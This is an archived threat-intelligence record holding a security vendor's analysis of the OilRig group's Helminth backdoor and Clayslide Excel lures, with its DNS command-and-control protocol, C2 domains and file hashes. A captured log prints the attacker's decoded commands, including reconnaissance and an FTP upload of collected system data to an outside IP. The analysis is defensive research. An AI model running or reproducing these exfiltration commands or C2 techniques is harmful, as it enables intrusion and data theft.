{ "id": "ce8ac920-0d90-4832-b4e1-0595688f96ac", "created_at": "2026-04-06T00:14:24.548908Z", "updated_at": "2026-04-10T03:37:36.888315Z", "deleted_at": null, "sha1_hash": "bc463df385a1da4e323f0cc33ac6fcedf0d2af86", "title": "OilRig Malware Campaign Updates Toolset and Expands Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1280621, "plain_text": "OilRig Malware Campaign Updates Toolset and Expands Targets\r\nBy Josh Grunzweig, Robert Falcone\r\nPublished: 2016-10-04 · Archived: 2026-04-05 13:56:46 UTC\r\nSince our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new\r\nactivity. In recent weeks we've discovered that the group have been actively updating their Clayslide delivery documents, as\r\nwell as the Helminth backdoor used against victims. Additionally, the scope of organizations targeted by this group has\r\nexpanded to not only include organizations within Saudi Arabia, but also a company in Qatar and government organizations\r\nin Turkey, Israel and the United States.\r\nExpanded Targeting\r\nThe group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel\r\ndocuments to compromise victims. As an example, the following email was sent to a Turkish government organization using\r\na lure of purported new portal logins for an airline’s website. (Please note that the sender email used in the figure below may\r\nhave been spoofed.)\r\nFigure 1 Phishing email sent to Turkish government organization\r\nWhen the users.xls file is executed and macros are enabled, the victim is presented with the following decoy document.\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 1 of 12\n\nFigure 2 Content contained in malicious Helminth XLS file\r\nThis same document content was used with Helminth samples targeting government organizations in multiple nations. For\r\nthose particular attacks, the following filenames were witnessed:\r\nHelp-Yemen.xls\r\nusers.xls\r\nIn addition to these instances, multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth\r\nsamples earlier this year. In those cases, the documents used to carry the malicious macro code were very specific to the\r\norganization receiving them and in some cases were sent from partner organizations that already had a relationship with the\r\nrecipient.\r\nUpdates to Toolset\r\nIn recent months, we’ve tracked a number of changes to the malware used by the actors responsible for OilRig. In the past\r\nfive months, we’ve identified four distinct variants, each of which drops different filenames upon execution. These variants\r\nuse the following filenames when dropped. (Please note that FireEye was notified about the use of their company name in\r\nthe malware upon discovery.)\r\nupdate.vbs / dns.ps1\r\nfireeye.vbs / fireeye.ps1\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 2 of 12\n\nupd.vbs / dn.ps1\r\nkomisova.vbs / komisova.ps1\r\nThe following timeline shows the prevalence of each variant.\r\nFigure 6 Helminth variants over time\r\nAs we can see in the above timeline, the attackers shifted from the update.vbs variant of their malware in late May 2016 to\r\nuse the fireeye.vbs variant. More recently, the upd.vbs variant was discovered, which appears to be an actively developed\r\ncopy. Comments and other artifacts were discovered in this variant, which will be discussed further later in this post. More\r\nrecently, the komisova.vbs variant was discovered to be used.\r\nChanges in VBScripts Between Variants\r\nOverall, there are minimal changes in the dropped VBS files between variants. As a reminder, the VBS script is responsible\r\nfor communicating with a remote server via HTTP. The script repeatedly attempts to download a file from the remote server,\r\nand proceeds to execute it when available. The output of this file is then uploaded via another HTTP request. It will also\r\nexecute the PowerShell script that is dropped by the Clayslide Excel documents.\r\nOverall, there are minor differences between the variants observed. The main differences appear to be in the domains and IP\r\naddresses used. The following URLs are used by each:\r\nupdate.vbs\r\nhxxp://winodwsupdates[.]me/counter.aspx?req=\r\nhxxp://go0gIe[.]com/sysupdate.aspx?req=\r\nfireeye.vbs\r\nhxxp://update-kernal[.]net/update-index.aspx?req=\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 3 of 12\n\nhxxp://upgradesystems[.]info/upgrade-index.aspx?req=\r\nhxxp://yahoooooomail[.]com/update-index.aspx?req=\r\nhxxp://googleupdate[.]download/update-index.aspx?req=\r\nupd.vbs\r\nhxxp://83.142.230[.]138:7020/update.php?req=\r\nkomisova.vbs\r\nhxxp://googleupdate[.]download/update-index.aspx?req=\r\nA few things to note include the fact that the komisova.vbs variant uses the same URL witnessed in the fireeye.vbs variant.\r\nIt’s worth pointing out that this domain was only seen in the most recent fireeye.vbs variants, so it’s very possible that it was\r\nused in a transition phase when the attackers were switching over to komisova.\r\nWe previously mentioned that the Excel file dropping upd.vbs was likely a development version. Evidence supporting this\r\nclaim includes the fact that an IP address connection using a non-standard port was used for this file. One particularly\r\ninteresting feature of this IP address is that it has ties to the Remexi report issued by Symantec in late 2015. This is in-line\r\nwith previous evidence suggesting an Iranian-based actor behind these attacks.\r\nFigure 7 Ties between IP address and Remexi (Shown in PassiveTotal)\r\nThe underlying code of upd.vbs is much cleaner when comparing it against the other variants. This can be seen below. This\r\nprovides additional evidence that it is being actively developed.\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 4 of 12\n\nFigure 8 Differences between upd.vbs and komisova.vbs\r\nAnother minor difference observed in the upd.vbs variant is the location of files that are downloaded. The three other\r\nvariants all place downloaded file within a subfolder that resides in %PUBLIC%/Libraries. However, this particular one-off\r\nplaces its files within subfolders that reside in %USERPROFILE%/AppData/Local/Microsoft/Media/.\r\nChanges in PS1 Between Variants\r\nSimilar to the VBS file, the PS1 file will also communicate with a remote server. Unlike the VBS file, the PS1 file uses DNS\r\ninstead of HTTP. Commands and file locations are received by the remote server, executed, and the output of these\r\ncommands is in turn uploaded via additional DNS requests. For an in-depth analysis on how this occurs, please refer to our\r\nprevious OilRig blog post. Overall, there are very minor differences between the dns, fireeye, and komisova PS1 variants.\r\nHowever, the dn.ps1 variant looks to have been updated considerably. In addition to these updates, the file is also heavily\r\ncommented, providing further evidence that this particular file is being actively developed.\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 5 of 12\n\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 6 of 12\n\nFigure 9 Beginning of dn.ps1 variant\r\nThe dn.ps1 variant will perform DNS queries with the following characteristics:\r\nrne_[victim_id]_[random].hostname\r\nrd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nbne_[victim_id]_random].hostname\r\nbd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nu_[victim_id]_[filename]_[byte_position]_[random].hostname\r\nIn the above queries, the ‘rne’ command will ask the remote server if a normal file is available for download. If it is, the\r\nserver will respond with a response of ‘OK’, followed by the filename. In such a situation, the malware will perform the ‘rd’\r\ncommand, which will actually download the file in question.\r\nSimilarly, the same execution flow is seen for the ‘bne’ and ‘bd’ commands respectively, only this particular operation is\r\nlooking for a batch file. In the event the malware is downloading files, it will look for a string of ‘EOFEOF’ to signal the end\r\nof the data stream.\r\nThe ‘u’ command is used to upload data that is generated from any provided files or scripts. Data is uploaded in chunks,\r\nwith the ‘byte_position’ variable holding the current byte position of the uploaded file.\r\nWe ran this particular variant for a number of days, and were able to solicit the attackers to interact with our honeypot. A\r\nPython script was used to parse the collected PCAP, with the following results (truncated for brevity):\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1988996938.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1404872126.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK1.txt\r\n[*] Filename: 1.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_0_840824109.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: aG9zdG5hbWU=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_8_1643283204.shalaghlagh.tk |\r\nType: TXT\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 7 of 12\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: hostname\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1534172028.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK2.txt\r\n[*] Filename: 2.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_0_579093369.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: c3lzdGVtaW5mbw==\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_10_1446367320.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: systeminfo\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1130109782.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1735654322.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK3.txt\r\n[*] Filename: 3.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_0_122829473.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_27_1524268269.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: start ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_117849324.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_926300114.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK5.txt\r\n[*] Filename: 5.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_0_1307455992.shalaghlagh.tk |\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 8 of 12\n\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\nType: TXT\r\n[+] Response TXT:\r\nd2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc\r\nlzdGVtaW5mbz4_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg\r\nfCBmdHAgLUEgODcuMTE3LjIwNC4x\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_150_2072649310.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: NDM=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_152_1977692291.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: whoami\u003ec:\\windows\\temp\\t.txt\r\nipconfig\u003e\u003ec:\\windows\\temp\\t.txt\r\nsysteminfo\u003e\u003ec:\\windows\\temp\\t.txt\r\necho PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_155964816.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1003791024.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK7.txt\r\n[*] Filename: 7.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_0_1649905845.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk |\r\nType: TXT\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: start ftp -A 83.142.230.138\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1205170103.shalaghlagh.tk | Type: TXT\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 9 of 12\n\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_779542217.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK11.txt\r\n[*] Filename: 11.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_0_1213525986.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_17_651256114.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: @echo off\r\necho 1\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_816831185.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\nAs we can see, a number of interesting commands were received by the attackers, including attempts to communicate with\r\nremote FTP servers and various reconnaissance commands. These commands came at seemingly random intervals,\r\nindicating they likely resulted from an actual attacker issuing them, versus an automated system.\r\nConclusion\r\nThe attackers using the Helminth and Clayslide malware families continue to target various high value companies and\r\norganizations across the globe using their customized malware. This malware is under active development and continues to\r\nbe updated and improved upon, as witnessed in the files discussed in this blog post. While the malware deployed is not\r\nterribly sophisticated, it uses techniques such as DNS command and control (C2) that allows it to stay under the radar at\r\nmany establishments.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nWildFire identifies all Helminth and Clayslide samples as malicious\r\nDomains identified as command and control servers are flagged as malicious\r\nAutoFocus tags Helminth and Clayslide may be used to track this group\r\nIndicators of Compromise\r\nF04CF9361CF46BFF2F9D19617BBA577EA5F3AD20EA76E1F7E159701E446364FC\r\nE2EC7FA60E654F5861E09BBE59D14D0973BD5727B83A2A03F1CECF1466DD87AA\r\n31DB0841C3975BE5395F13C894B7E444D150CC701487B756FFF43CE78D98B1E6\r\nC3C17383F43184A29F49F166A92453A34BE18E51935DDBF09576A60441440E51\r\nC6437F57A8F290B5EC46B0933BFA8A328B0CB2C0C7FBEEA7F21B770CE0250D3D\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 10 of 12\n\n5A2C38BE89AC878D28080A7465C4A3F8708FB414B811511B9D5AE61A47593A69\r\nBD0920C8836541F58E0778B4B64527E5A5F2084405F73EE33110F7BC189DA7A9\r\n90639C7423A329E304087428A01662CC06E2E9153299E37B1B1C90F6D0A195ED\r\n528D432952EF879496542BC62A5A4B6EEE788F60F220426BD7F933FA2C58DC6B\r\n3772D473A2FE950959E1FD56C9A44EC48928F92522246F75F4B8CB134F4713FF\r\nF3856C7AF3C9F84101F41A82E36FC81DFC18A8E9B424A3658B6BA7E3C99F54F2\r\n0CD9857A3F626F8E0C07495A4799C59D502C4F3970642A76882E3ED68B790F8E\r\n80161DAD1603B9A7C4A92A07B5C8BCE214CF7A3DF897B561732F9DF7920ECB3E\r\nD874F513A032CCB6A5E4F0CD55862B024EA0BEE4DE94CCF950B3DD894066065D\r\n5E9DDB25BDE3719C392D08C13A295DB418D7ACCD25D82D020B425052E7BA6DC9\r\n299BC738D7B0292820D99028289280BA24D7FB985851D9C74060AF7950CECEF0\r\n2E226A0210A123AD828803EB871B74ECBDB702FC4BABD9FF786231C486FF65E0\r\nF1DE7B941817438DA2A4B7284BC56C291DB7312E3BA5E2397B3621811A816AA3\r\n65920EAEA00764A245ACB58A3565941477B78A7BCC9EFAEC5BF811573084B6CF\r\n742A52084162D3789E196FB5FF6F8E2983147CD914088BD5F9ED363D7A5B0DF0\r\n4E5B85EA68BF8F2306B6B931810AE38C8DFF3679D78DA1AF2C91032C36380353\r\n36D4B4B018EC78A79F3C06DC30EC77C250307628A7631F6B5B5995E797D0674F\r\n005DDE45A6F1D9B2A254E71F89F12AB0DFAAA48D081F5C0A434800BD5C327086\r\n2C4BCAB135BF1846684B598E66E3F51443F70F9E8D0544F3417774CBE907E8EF\r\nC4FBC723981FC94884F0F493CB8711FDC9DA698980081D9B7C139FCFFBE723DA\r\nCFFC694ACE3E1547007AE00437536F2A88BA60179C51F23228E696FB02AFDC86\r\n0B9437DD87A3C24ED7D200F9B870D69F9B7AD918C51325C11444DF8BC6FB97BA\r\n903B6D948C16DC92B69FE1DE76CF64AB8377893770BF47C29BF91F3FD987F996\r\n8BFBB637FE72DA5C9AEE9857CA81FA54A5ABE7F2D1B061BC2A376943C63727C7\r\n9C0A33A5DC62933F17506F20E0258F877947BDCD15B091A597EAC05D299B7471\r\n93940B5E764F2F4A2D893BEBEF4BF1F7D63C4DB856877020A5852A6647CB04A0\r\n0EC288AC8C4AA045A45526C2939DBD843391C9C75FA4A3BCC0A6D7DC692FDCD1\r\n089BF971E8839DB818AC462F53F82DAED523C413BFC2E01FB76DD70B37162AFE\r\nD808F3109822C185F1D8E1BF7EF7781C219DC56F5906478651748F0ACE489D34\r\n3986D54B00647B507B2AFD708B7A1CE4C37027FB77D67C6BC3C20C3AC1A88CA4\r\n1B2FEE00D28782076178A63E669D2306C37BA0C417708D4DC1F751765C3F94E1\r\n662C53E69B66D62A4822E666031FD441BBDFA741E20D4511C6741EC3CB02475F\r\nF5A64DE9087B138608CCF036B067D91A47302259269FB05B3349964CA4060E7E\r\nA787C0E42608F9A69F718F6DCA5556607BE45EC77D17B07EB9EA1E0F7BB2E064\r\n4B5112F0FB64825B879B01D686E8F4D43521252A3B4F4026C9D1D76D3F15B281\r\n3AF6DFA4CEBD82F48B6638A9757730810707D79D961DDE1B72D3768E972E6184\r\nC2 Servers\r\nshalaghlagh[.]tk\r\ngo0gIe[.]com\r\nwinodwsupdates[.]me\r\nupdate-kernal[.]net\r\ngoogleupdate[.]download\r\nyahoooooomail[.]com\r\nupgradesystems[.]info\r\nFile Paths\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 11 of 12\n\n%PUBLIC%/Libraries/dn\r\n%PUBLIC%/Libraries/up\r\n%USERPROFILE%/AppData/Local/Microsoft/Media/up\r\n%USERPROFILE%/AppData/Local/Microsoft/Media/dn\r\nSource: http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "references": [ "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "report_names": [ "unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets" ], "threat_actors": [ { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434464, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.pdf", "text": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.txt", "img": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.jpg" } }